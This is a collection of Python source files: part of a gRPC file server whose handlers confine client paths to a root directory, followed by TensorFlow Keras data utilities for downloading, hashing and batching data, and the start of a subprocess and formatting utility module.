Clients are only permitted to operate inside the root dir def cd(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.str if request.str[0] == '/' or not ospath.exists(path) or not ospath.isdir(path): return fs.fs_reply(done=0) path = ospath.abspath(path) # dir pointed by path must be a sub-dir of the root if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) self.curPathDict[request.id] = path[len(self.rootPath):] if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).cd(fs.stringMes(str=request.str, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # make a new dir given a valid path def mkdir(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.str if request.str[0] == '/' or ospath.exists(path): return fs.fs_reply(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) os.mkdir(path) if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).mkdir(fs.stringMes(str=request.str, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # remove a file or dir. Recursive delete for a dir def rm(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.str if request.str[0] == '/' or not ospath.exists(path): return fs.fs_reply(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) if ospath.isdir(path): os.removedirs(path) else: os.remove(path) if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).rm(fs.stringMes(str=request.str, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # upload given file to the server. Broadcast update to other replicas def upload(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.path if request.path[0] == '/': return fs.fs_reply(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.fs_reply(done=0) if not ospath.exists(path): os.mknod(path) with open(path, "wb") as fp: fp.write(request.buffer) if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).upload(fs.upRequest(path=request.path, buffer=request.buffer, id=request.id, cascading=0)) except StopIteration: break return fs.fs_reply(done=1) # download given file from the server. 
def download(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] + "/" + request.path if request.path[0] == '/' or not ospath.exists(path) or not ospath.isfile(path): return fs.bufferMes(done=0) path = ospath.abspath(path) if len(ospath.commonpath([path, self.rootPath])) < len(self.rootPath): return fs.bufferMes(done=0) with open(path, "rb") as fp: content = fp.read() return fs.bufferMes(buffer=content, done=1) def serve(ip, port, rootPath): servicer = file_server(ip, port, rootPath) if not ospath.exists(rootPath): os.mkdir(rootPath) server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) fs_grpc.add_file_serverServicer_to_server(servicer, server) server.add_insecure_port("[::]:{}".format(port)) server.start() server.wait_for_termination() if __name__ == "__main__": serve("127.0.0.1", sys.argv[1], "/home/jing/code/dfs/data")
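Every path-taking RPC above (cd, mkdir, rm, upload, download) repeats the same containment check: reject absolute paths, resolve the request under the server root, and require that the resolved path still has the root as a prefix. The sketch below pulls that check into one helper; the names are hypothetical, and the original simply inlines the three steps in each method.

import os.path as ospath

def inside_root(root, cur, requested):
    # Return the resolved absolute path if `requested` stays inside `root`, else None.
    if not requested or requested[0] == '/':
        return None                                   # absolute paths are rejected outright
    path = ospath.abspath(root + "/" + cur + "/" + requested)
    if len(ospath.commonpath([path, root])) < len(root):
        return None                                   # ".." escaped the root directory
    return path

print(inside_root("/srv/fserver_0", "docs", "../../etc/passwd"))  # -> None
print(inside_root("/srv/fserver_0", "docs", "notes.txt"))         # -> /srv/fserver_0/docs/notes.txt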
data_utils.py
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=g-import-not-at-top """Utilities for file download and caching.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from abc import abstractmethod from contextlib import closing import hashlib import multiprocessing from multiprocessing.pool import ThreadPool import os import random import shutil import sys import tarfile import threading import time import traceback import zipfile import numpy as np import six from six.moves.urllib.error import HTTPError from six.moves.urllib.error import URLError from six.moves.urllib.request import urlopen from tensorflow.python.keras._impl.keras.utils.generic_utils import Progbar from tensorflow.python.util.tf_export import tf_export try: import queue except ImportError: import Queue as queue if sys.version_info[0] == 2: def urlretrieve(url, filename, reporthook=None, data=None): """Replacement for `urlretrive` for Python 2. Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy `urllib` module, known to have issues with proxy management. Arguments: url: url to retrieve. filename: where to store the retrieved data locally. reporthook: a hook function that will be called once on establishment of the network connection and once after each block read thereafter. The hook will be passed three arguments; a count of blocks transferred so far, a block size in bytes, and the total size of the file. data: `data` argument passed to `urlopen`. """ def chunk_read(response, chunk_size=8192, reporthook=None): content_type = response.info().get('Content-Length') total_size = -1 if content_type is not None: total_size = int(content_type.strip()) count = 0 while True: chunk = response.read(chunk_size) count += 1 if reporthook is not None: reporthook(count, chunk_size, total_size) if chunk: yield chunk else: break response = urlopen(url, data) with open(filename, 'wb') as fd: for chunk in chunk_read(response, reporthook=reporthook): fd.write(chunk) else: from six.moves.urllib.request import urlretrieve def _extract_archive(file_path, path='.', archive_format='auto'): """Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats. Arguments: file_path: path to the archive file path: path to extract the archive file archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. Returns: True if a match was found and an archive extraction was completed, False otherwise. 
""" if archive_format is None: return False if archive_format is 'auto': archive_format = ['tar', 'zip'] if isinstance(archive_format, six.string_types): archive_format = [archive_format] for archive_type in archive_format: if archive_type is 'tar': open_fn = tarfile.open is_match_fn = tarfile.is_tarfile if archive_type is 'zip': open_fn = zipfile.ZipFile is_match_fn = zipfile.is_zipfile if is_match_fn(file_path): with open_fn(file_path) as archive: try: archive.extractall(path) except (tarfile.TarError, RuntimeError, KeyboardInterrupt): if os.path.exists(path): if os.path.isfile(path): os.remove(path) else: shutil.rmtree(path) raise return True return False @tf_export('keras.utils.get_file') def get_file(fname, origin, untar=False, md5_hash=None, file_hash=None, cache_subdir='datasets', hash_algorithm='auto', extract=False, archive_format='auto', cache_dir=None): """Downloads a file from a URL if it not already in the cache. By default the file at the url `origin` is downloaded to the cache_dir `~/.keras`, placed in the cache_subdir `datasets`, and given the filename `fname`. The final location of a file `example.txt` would therefore be `~/.keras/datasets/example.txt`. Files in tar, tar.gz, tar.bz, and zip formats can also be extracted. Passing a hash will verify the file after download. The command line programs `shasum` and `sha256sum` can compute the hash. Arguments: fname: Name of the file. If an absolute path `/path/to/file.txt` is specified the file will be saved at that location. origin: Original URL of the file. untar: Deprecated in favor of 'extract'. boolean, whether the file should be decompressed md5_hash: Deprecated in favor of 'file_hash'. md5 hash of the file for verification file_hash: The expected hash string of the file after download. The sha256 and md5 hash algorithms are both supported. cache_subdir: Subdirectory under the Keras cache dir where the file is saved. If an absolute path `/path/to/folder` is specified the file will be saved at that location. hash_algorithm: Select the hash algorithm to verify the file. options are 'md5', 'sha256', and 'auto'. The default 'auto' detects the hash algorithm in use. extract: True tries extracting the file as an Archive, like tar or zip. archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. cache_dir: Location to store cached files, when None it defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored). Returns: Path to the downloaded file """ if cache_dir is None: cache_dir = os.path.join(os.path.expanduser('~'), '.keras') if md5_hash is not None and file_hash is None: file_hash = md5_hash hash_algorithm = 'md5' datadir_base = os.path.expanduser(cache_dir) if not os.access(datadir_base, os.W_OK): datadir_base = os.path.join('/tmp', '.keras') datadir = os.path.join(datadir_base, cache_subdir) if not os.path.exists(datadir): os.makedirs(datadir) if untar: untar_fpath = os.path.join(datadir, fname) fpath = untar_fpath + '.tar.gz' else: fpath = os.path.join(datadir, fname) download = False if os.path.exists(fpath): # File found; verify integrity if a hash was provided. 
if file_hash is not None: if not validate_file(fpath, file_hash, algorithm=hash_algorithm): print('A local file was found, but it seems to be ' 'incomplete or outdated because the ' + hash_algorithm + ' file hash does not match the original value of ' + file_hash + ' so we will re-download the data.') download = True else: download = True if download: print('Downloading data from', origin) class ProgressTracker(object): # Maintain progbar for the lifetime of download. # This design was chosen for Python 2.7 compatibility. progbar = None def dl_progress(count, block_size, total_size): if ProgressTracker.progbar is None: if total_size is -1: total_size = None ProgressTracker.progbar = Progbar(total_size) else: ProgressTracker.progbar.update(count * block_size) error_msg = 'URL fetch failure on {}: {} -- {}' try: try: urlretrieve(origin, fpath, dl_progress) except URLError as e: raise Exception(error_msg.format(origin, e.errno, e.reason)) except HTTPError as e: raise Exception(error_msg.format(origin, e.code, e.msg)) except (Exception, KeyboardInterrupt) as e: if os.path.exists(fpath): os.remove(fpath) raise ProgressTracker.progbar = None if untar: if not os.path.exists(untar_fpath): _extract_archive(fpath, datadir, archive_format='tar') return untar_fpath if extract: _extract_archive(fpath, datadir, archive_format) return fpath def _hash_file(fpath, algorithm='sha256', chunk_size=65535): """Calculates a file sha256 or md5 hash. Example: ```python >>> from keras.data_utils import _hash_file >>> _hash_file('/path/to/file.zip') 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' ``` Arguments: fpath: path to the file being validated algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. Returns: The file hash """ if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64): hasher = hashlib.sha256() else: hasher = hashlib.md5() with open(fpath, 'rb') as fpath_file: for chunk in iter(lambda: fpath_file.read(chunk_size), b''): hasher.update(chunk) return hasher.hexdigest() def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535): """Validates a file against a sha256 or md5 hash. Arguments: fpath: path to the file being validated file_hash: The expected hash string of the file. The sha256 and md5 hash algorithms are both supported. algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. Returns: Whether the file is valid """ if ((algorithm is 'sha256') or (algorithm is 'auto' and len(file_hash) is 64)): hasher = 'sha256' else: hasher = 'md5' if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash): return True else: return False @tf_export('keras.utils.Sequence') class Sequence(object): """Base object for fitting to a sequence of data, such as a dataset. Every `Sequence` must implements the `__getitem__` and the `__len__` methods. If you want to modify your dataset between epochs you may implement `on_epoch_end`. The method `__getitem__` should return a complete batch. # Notes `Sequence` are a safer way to do multiprocessing. This structure guarantees that the network will only train once on each sample per epoch which is not the case with generators. 
Examples: ```python from skimage.io import imread from skimage.transform import resize import numpy as np import math # Here, `x_set` is list of path to the images # and `y_set` are the associated classes. class CIFAR10Sequence(Sequence): def __init__(self, x_set, y_set, batch_size): self.x, self.y = x_set, y_set self.batch_size = batch_size def __len__(self): return math.ceil(len(self.x) / self.batch_size) def __getitem__(self, idx): batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size] batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size] return np.array([ resize(imread(file_name), (200, 200)) for file_name in batch_x]), np.array(batch_y) ``` """ @abstractmethod def __getitem__(self, index): """Gets batch at position `index`. Arguments: index: position of the batch in the Sequence. Returns: A batch """ raise NotImplementedError @abstractmethod def __len__(self): """Number of batch in the Sequence. Returns: The number of batches in the Sequence. """ raise NotImplementedError def on_epoch_end(self): """Method called at the end of every epoch. """ pass # Global variables to be shared across processes _SHARED_SEQUENCES = {} # We use a Value to provide unique id to different processes. _SEQUENCE_COUNTER = None def get_index(uid, i): """Get the value from the Sequence `uid` at index `i`. To allow multiple Sequences to be used at the same time, we use `uid` to get a specific one. A single Sequence would cause the validation to overwrite the training Sequence. Arguments: uid: int, Sequence identifier i: index Returns: The value at index `i`. """ return _SHARED_SEQUENCES[uid][i] @tf_export('keras.utils.SequenceEnqueuer') class SequenceEnqueuer(object): """Base class to enqueue inputs. The task of an Enqueuer is to use parallelism to speed up preprocessing. This is done with processes or threads. Examples: ```python enqueuer = SequenceEnqueuer(...) enqueuer.start() datas = enqueuer.get() for data in datas: # Use the inputs; training, evaluating, predicting. # ... stop sometime. enqueuer.close() ``` The `enqueuer.get()` should be an infinite stream of datas. """ @abstractmethod def is_running(self): raise NotImplementedError @abstractmethod def start(self, workers=1, max_queue_size=10): """Starts the handler's workers. Arguments: workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`). """ raise NotImplementedError @abstractmethod def stop(self, timeout=None): """Stop running threads and wait for them to exit, if necessary. Should be called by the same thread which called start(). Arguments: timeout: maximum time to wait on thread.join() """ raise NotImplementedError @abstractmethod def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. Returns: Generator yielding tuples `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ raise NotImplementedError class OrderedEnqueuer(SequenceEnqueuer): """Builds a Enqueuer from a Sequence. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. Arguments: sequence: A `keras.utils.data_utils.Sequence` object. 
use_multiprocessing: use multiprocessing if True, otherwise threading shuffle: whether to shuffle the data at the beginning of each epoch """ def __init__(self, sequence, use_multiprocessing=False, shuffle=False): self.sequence = sequence self.use_multiprocessing = use_multiprocessing global _SEQUENCE_COUNTER if _SEQUENCE_COUNTER is None: try: _SEQUENCE_COUNTER = multiprocessing.Value('i', 0) except OSError: # In this case the OS does not allow us to use # multiprocessing. We resort to an int # for enqueuer indexing. _SEQUENCE_COUNTER = 0 if isinstance(_SEQUENCE_COUNTER, int): self.uid = _SEQUENCE_COUNTER _SEQUENCE_COUNTER += 1 else: # Doing Multiprocessing.Value += x is not process-safe. with _SEQUENCE_COUNTER.get_lock(): self.uid = _SEQUENCE_COUNTER.value _SEQUENCE_COUNTER.value += 1 self.shuffle = shuffle self.workers = 0 self.executor_fn = None self.queue = None self.run_thread = None self.stop_signal = None def is_running(self): return self.stop_signal is not None and not self.stop_signal.is_set() def start(self, workers=1, max_queue_size=10): """Start the handler's workers. Arguments: workers: number of worker threads max_queue_size: queue size (when full, workers could block on `put()`) """ if self.use_multiprocessing: self.executor_fn = lambda: multiprocessing.Pool(workers) else: self.executor_fn = lambda: ThreadPool(workers) self.workers = workers self.queue = queue.Queue(max_queue_size) self.stop_signal = threading.Event() self.run_thread = threading.Thread(target=self._run) self.run_thread.daemon = True self.run_thread.start() def _wait_queue(self): """Wait for the queue to be empty.""" while True: time.sleep(0.1) if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set(): return def _run(self): """Submits request to the executor and queue the `Future` objects.""" sequence = list(range(len(self.sequence))) self._send_sequence() # Share the initial sequence while True: if self.shuffle: random.shuffle(sequence) with closing(self.executor_fn()) as executor: for i in sequence: if self.stop_signal.is_set(): return self.queue.put( executor.apply_async(get_index, (self.uid, i)), block=True) # Done with the current epoch, waiting for the final batches self._wait_queue() if self.stop_signal.is_set(): # We're done return # Call the internal on epoch end. self.sequence.on_epoch_end() self._send_sequence() # Update the pool def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. Yields: The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ try: while self.is_running(): inputs = self.queue.get(block=True).get() self.queue.task_done() if inputs is not None: yield inputs except Exception as e: # pylint: disable=broad-except self.stop() six.raise_from(StopIteration(e), e) def _send_sequence(self): """Send current Sequence to all workers.""" # For new processes that may spawn _SHARED_SEQUENCES[self.uid] = self.sequence def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. Arguments: timeout: maximum time to wait on `thread.join()` """ self.stop_signal.set() with self.queue.mutex: self.queue.queue.clear() self.queue.unfinished_tasks = 0 self.queue.not_full.notify() self.run_thread.join(timeout) _SHARED_SEQUENCES[self.uid] = None @tf_export('keras.utils.GeneratorEnqueuer') class GeneratorEnqueuer(SequenceEnqueuer): """Builds a queue out of a data generator. 
The provided generator can be finite in which case the class will throw a `StopIteration` exception. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. Arguments: generator: a generator function which yields data use_multiprocessing: use multiprocessing if True, otherwise threading wait_time: time to sleep in-between calls to `put()` random_seed: Initial seed for workers, will be incremented by one for each worker. """ def __init__(self, generator, use_multiprocessing=False, wait_time=0.05, seed=None): self.wait_time = wait_time self._generator = generator if os.name is 'nt' and use_multiprocessing is True: # On Windows, avoid **SYSTEMATIC** error in `multiprocessing`: # `TypeError: can't pickle generator objects` # => Suggest multithreading instead of multiprocessing on Windows raise ValueError('Using a generator with `use_multiprocessing=True`' ' is not supported on Windows (no marshalling of' ' generators across process boundaries). Instead,' ' use single thread/process or multithreading.') else: self._use_multiprocessing = use_multiprocessing self._threads = [] self._stop_event = None self._manager = None self.queue = None self.seed = seed def _data_generator_task(self): if self._use_multiprocessing is False: while not self._stop_event.is_set(): with self.genlock: try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): # On all OSes, avoid **SYSTEMATIC** error # in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to # infinite iterator/generator's next() function generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # pylint: disable=broad-except # Can't pickle tracebacks. # As a compromise, print the traceback and pickle None instead. if not hasattr(e, '__traceback__'): setattr(e, '__traceback__', sys.exc_info()[2]) self.queue.put((False, e)) self._stop_event.set() break else: while not self._stop_event.is_set(): try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # pylint: disable=broad-except # Can't pickle tracebacks. # As a compromise, print the traceback and pickle None instead. traceback.print_exc() setattr(e, '__traceback__', None) self.queue.put((False, e)) self._stop_event.set() break def start(self, workers=1, max_queue_size=10): """Kicks off threads which add data from the generator into the queue. 
Arguments: workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`) """ try: self.max_queue_size = max_queue_size if self._use_multiprocessing: self._manager = multiprocessing.Manager() self.queue = self._manager.Queue(maxsize=max_queue_size) self._stop_event = multiprocessing.Event() else: # On all OSes, avoid **SYSTEMATIC** error in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to infinite iterator/generator's next() function self.genlock = threading.Lock() self.queue = queue.Queue(maxsize=max_queue_size) self._stop_event = threading.Event() for _ in range(workers): if self._use_multiprocessing: # Reset random seed else all children processes # share the same seed np.random.seed(self.seed) thread = multiprocessing.Process(target=self._data_generator_task) thread.daemon = True if self.seed is not None: self.seed += 1 else: thread = threading.Thread(target=self._data_generator_task) self._threads.append(thread) thread.start() except: self.stop() raise def is_running(self): return self._stop_event is not None and not self._stop_event.is_set() def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. Arguments: timeout: maximum time to wait on `thread.join()`. """ if self.is_running(): self._stop_event.set() for thread in self._threads: if self._use_multiprocessing: if thread.is_alive(): thread.terminate() else: # The thread.is_alive() test is subject to a race condition: # the thread could terminate right after the test and before the # join, rendering this test meaningless -> Call thread.join() # always, which is ok no matter what the status of the thread. thread.join(timeout) if self._manager: self._manager.shutdown() self._threads = [] self._stop_event = None self.queue = None def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. Yields: The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ while self.is_running(): if not self.queue.empty(): success, value = self.queue.get() # Rethrow any exceptions found in the queue if not success: six.reraise(value.__class__, value, value.__traceback__) # Yield regular values if value is not None: yield value else: all_finished = all([not thread.is_alive() for thread in self._threads]) if all_finished and self.queue.empty(): raise StopIteration() else: time.sleep(self.wait_time) # Make sure to rethrow the first exception in the queue, if any while not self.queue.empty(): success, value = self.queue.get() if not success: six.reraise(value.__class__, value, value.__traceback__)
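To make the enqueuer machinery above concrete, here is a small sketch: a toy Sequence over in-memory arrays consumed through an OrderedEnqueuer. It assumes Sequence and OrderedEnqueuer from this module are in scope; the arrays, batch size and worker counts are arbitrary.

import math
import numpy as np

class ArraySequence(Sequence):
    # Toy Sequence yielding fixed-size slices of two in-memory arrays.
    def __init__(self, x, y, batch_size):
        self.x, self.y, self.batch_size = x, y, batch_size

    def __len__(self):
        return int(math.ceil(len(self.x) / float(self.batch_size)))

    def __getitem__(self, idx):
        s = slice(idx * self.batch_size, (idx + 1) * self.batch_size)
        return self.x[s], self.y[s]

seq = ArraySequence(np.arange(100).reshape(50, 2), np.arange(50), batch_size=8)
enqueuer = OrderedEnqueuer(seq, use_multiprocessing=False, shuffle=False)  # thread pool
enqueuer.start(workers=2, max_queue_size=4)
batches = enqueuer.get()            # generator of (inputs, targets) tuples
for _ in range(len(seq)):           # one pass over the data
    x_batch, y_batch = next(batches)
enqueuer.stop()

Passing use_multiprocessing=True swaps the ThreadPool for a multiprocessing.Pool; that is where the _SHARED_SEQUENCES and _SEQUENCE_COUNTER globals above come in, giving each worker process a way to look up the right Sequence by its uid.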
util.py
# -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license - see LICENSE.rst """ Various low-level utilities. """ from __future__ import (absolute_import, division, print_function, unicode_literals) import datetime import json import math import os import re import select import signal import subprocess import struct import sys import time import errno import threading import shutil import stat import shlex import operator import collections import multiprocessing import six from six.moves import xrange from .extern import minify_json nan = float('nan') inf = float('inf') WIN = (os.name == 'nt') if not WIN: try: from select import PIPE_BUF except ImportError: # PIPE_BUF is not available on Python 2.6 PIPE_BUF = os.pathconf('.', os.pathconf_names['PC_PIPE_BUF']) TIMEOUT_RETCODE = -256 class UserError(Exception): pass class ParallelFailure(Exception): """ Custom exception to work around a multiprocessing bug https://bugs.python.org/issue9400 """ def __new__(cls, message, exc_cls, traceback_str): self = Exception.__new__(cls) self.message = message self.exc_cls = exc_cls self.traceback_str = traceback_str return self def __reduce__(self): return (ParallelFailure, (self.message, self.exc_cls, self.traceback_str)) def __str__(self): return "{0}: {1}\n {2}".format(self.exc_cls.__name__, self.message, self.traceback_str.replace("\n", "\n ")) def reraise(self): if self.exc_cls is UserError: raise UserError(self.message) else: raise self def human_list(l): """ Formats a list of strings in a human-friendly way. """ l = ["'{0}'".format(x) for x in l] if len(l) == 0: return 'nothing' elif len(l) == 1: return l[0] elif len(l) == 2: return ' and '.join(l) else: return ', '.join(l[:-1]) + ' and ' + l[-1] def human_float(value, significant=3, truncate_small=None, significant_zeros=False): """ Return a string representing a float with human friendly significant digits. Switches to scientific notation for too large/small numbers. If `truncate_small`, then leading zeros of numbers < 1 are counted as significant. If not `significant_zeros`, trailing unnecessary zeros are stripped. """ if value == 0: return "0" elif math.isinf(value) or math.isnan(value): return "{}".format(value) elif value < 0: sign = "-" value = -value else: sign = "" logv = math.log10(value) magnitude = int(math.floor(logv)) + 1 if truncate_small is not None: magnitude = max(magnitude, -truncate_small + 1) num_digits = significant - magnitude if magnitude <= -5 or magnitude >= 9: # Too many digits, use scientific notation fmt = "{{0:.{0}e}}".format(significant) elif value == int(value): value = int(round(value, num_digits)) fmt = "{0:d}" elif num_digits <= 0: value = int(round(value, num_digits)) fmt = "{0:d}" else: fmt = "{{0:.{0}f}}".format(num_digits) formatted = sign + fmt.format(value) if not significant_zeros and '.' in formatted and 'e' not in fmt: formatted = formatted.rstrip('0') if formatted[-1] == '.': formatted = formatted[:-1] if significant_zeros and '.' not in formatted: if len(formatted) < significant: formatted += "." + "0"*(significant - len(formatted)) return formatted def human_file_size(size, err=None): """ Returns a human-friendly string representing a file size that is 2-4 characters long. 
For example, depending on the number of bytes given, can be one of:: 256b 64k 1.1G Parameters ---------- size : int The size of the file (in bytes) Returns ------- size : str A human-friendly representation of the size of the file """ size = float(size) if size < 1: size = 0.0 suffixes = ' kMGTPEH' if size == 0: num_scale = 0 else: num_scale = int(math.floor(math.log(size) / math.log(1000))) if num_scale > 7: suffix = '?' else: suffix = suffixes[num_scale].strip() scale = int(math.pow(1000, num_scale)) value = size / scale str_value = human_float(value, 3) if err is None: return "{0:s}{1}".format(str_value, suffix) else: str_err = human_float(err / scale, 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_value, str_err, suffix) _human_time_units = ( ('ns', 0.000000001), ('μs', 0.000001), ('ms', 0.001), ('s', 1), ('m', 60), ('h', 60 * 60), ('d', 60 * 60 * 24), ('w', 60 * 60 * 24 * 7), ('y', 60 * 60 * 24 * 7 * 52), ('C', 60 * 60 * 24 * 7 * 52 * 100) ) def human_time(seconds, err=None): """ Returns a human-friendly time string that is always exactly 6 characters long. Depending on the number of seconds given, can be one of:: 1w 3d 2d 4h 1h 5m 1m 4s 15s Will be in color if console coloring is turned on. Parameters ---------- seconds : int The number of seconds to represent Returns ------- time : str A human-friendly representation of the given number of seconds that is always exactly 6 characters. """ units = _human_time_units seconds = float(seconds) scale = seconds if scale == 0 and err is not None: scale = float(err) if scale == 0: # Represent zero in reasonable units units = [('s', 1), ('m', 60)] if scale != scale: # nan return "n/a" for i in xrange(len(units) - 1): if scale < units[i+1][1]: str_time = human_float(seconds / units[i][1], 3, significant_zeros=True) if err is None: return "{0:s}{1}".format(str_time, units[i][0]) else: str_err = human_float(err / units[i][1], 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_time, str_err, units[i][0]) return '~0' def human_value(value, unit, err=None): """ Formats a value in a given unit in a human friendly way. Parameters ---------- value : anything The value to format unit : str The unit the value is in. Currently understands `seconds` and `bytes`. err : float, optional Std. error in the value """ if isinstance(value, (int, float)): if value != value: # nan display = "n/a" elif unit == 'seconds': display = human_time(value, err=err) elif unit == 'bytes': display = human_file_size(value, err=err) else: display = json.dumps(value) if err is not None: display += "±{:.2g}".format(err) elif value is None: display = "failed" else: display = json.dumps(value) return display def parse_human_time(string, base_period='d'): """ Parse a human-specified time period to an integer number of seconds. The following format is accepted: <number><suffix> Raises a ValueError on parse error. """ units = dict(_human_time_units) units[''] = units[base_period] suffixes = '|'.join(units.keys()) try: m = re.match(r'^\s*([0-9.]+)\s*({})\s*$'.format(suffixes), string) if m is None: raise ValueError() return float(m.group(1)) * units[m.group(2)] except ValueError: raise ValueError("%r is not a valid time period (valid units: %s)" % (string, suffixes)) def which(filename, paths=None): """ Emulates the UNIX `which` command in Python. Raises an IOError if no result is found. 
""" # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', IOError) if os.path.sep in filename: locations = [''] elif paths is not None: locations = paths else: locations = os.environ.get("PATH", "").split(os.pathsep) if WIN: # On windows, an entry in %PATH% may be quoted locations = [path[1:-1] if len(path) > 2 and path[0] == path[-1] == '"' else path for path in locations] if WIN: filenames = [filename + ext for ext in ('.exe', '.bat', '.com', '')] else: filenames = [filename] candidates = [] for location in locations: for filename in filenames: candidate = os.path.join(location, filename) if os.path.isfile(candidate) or os.path.islink(candidate): candidates.append(candidate) if len(candidates) == 0: if paths is None: loc_info = 'PATH' else: loc_info = os.pathsep.join(locations) raise IOError("Could not find '{0}' in {1}".format(filename, loc_info)) return candidates[0] def has_command(filename): """ Returns `True` if the commandline utility exists. """ try: which(filename) except IOError: return False else: return True class ProcessError(subprocess.CalledProcessError): def __init__(self, args, retcode, stdout, stderr): self.args = args self.retcode = retcode self.stdout = stdout self.stderr = stderr def __str__(self): if self.retcode == TIMEOUT_RETCODE: return "Command '{0}' timed out".format( ' '.join(self.args)) else: return "Command '{0}' returned non-zero exit status {1}".format( ' '.join(self.args), self.retcode) def check_call(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, env=None, cwd=None): """ Runs the given command in a subprocess, raising ProcessError if it fails. See `check_output` for parameters. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) check_output( args, valid_return_codes=valid_return_codes, timeout=timeout, dots=dots, display_error=display_error, shell=shell, env=env, cwd=cwd) class DebugLogBuffer(object): def __init__(self, log): self.buf = [] self.first = True self.linebreak_re = re.compile(b'.*\n') self.log = log def __call__(self, c): if c is None: text = b"".join(self.buf) del self.buf[:] elif b'\n' in c: m = self.linebreak_re.match(c) j = m.end() self.buf.append(c[:j]) text = b"".join(self.buf) self.buf[:] = [c[j:]] else: self.buf.append(c) return text = text.decode('utf-8', 'replace') if text.endswith('\n'): text = text[:-1] if text: if self.first: self.log.debug('OUTPUT -------->', continued=True) self.first = False self.log.debug(text, continued=True) def check_output(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, return_stderr=False, env=None, cwd=None, redirect_stderr=False, return_popen=False): """ Runs the given command in a subprocess, raising ProcessError if it fails. Returns stdout as a string on success. Parameters ---------- valid_return_codes : list, optional A list of return codes to ignore. Defaults to only ignoring zero. Setting to None ignores all return codes. timeout : number, optional Kill the process if it does not produce any output in `timeout` seconds. If `None`, there is no timeout. Default: 10 min dots : bool, optional If `True` (default) write a dot to the console to show progress as the subprocess outputs content. May also be a callback function to call (with no arguments) to indicate progress. 
